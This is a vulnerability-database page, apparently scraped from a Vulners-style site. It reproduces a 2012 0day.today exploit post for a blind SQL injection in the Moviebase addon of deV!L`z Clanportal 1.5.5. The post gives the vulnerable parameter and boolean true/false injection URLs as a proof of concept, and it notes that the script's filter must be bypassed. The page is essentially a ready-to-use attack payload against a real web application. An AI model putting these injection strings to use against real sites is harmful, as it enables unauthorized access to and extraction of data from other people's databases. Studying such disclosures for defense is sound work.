Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtEasy Laster1337DAY-ID-17399
HistoryJan 18, 2012 - 12:00 a.m.

deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability

2012-01-1800:00:00
Easy Laster
0day.today
25
JSON

Exploit for php platform in category web applications

========================================================================================                
| # Title    : deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability        
| # Author   : Easy Laster        
| # Download : http://www.modsbar.de/Addons/79/moviebase/
| # Script   : deV!L`z Clanportal 1.5.5 Moviebase    
| # Bug      : Blind SQL Injection  
| # Date     : 12.01.2012
| # Language : PHP
| # Status   : vulnerable/Non-Public
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah                                                              
======================        Proof of Concept         =================================
[+] Vulnerability
 
    movies/index.php?action=showkat&id=
 
[+] Injectable
 
    #true
 
    http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=1--+
 
 
    #false  
 
    http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=2--+
 
[-] The SQL Injection Filter Function must be bypassed  ()



#  0day.today [2018-02-05]  #
JSON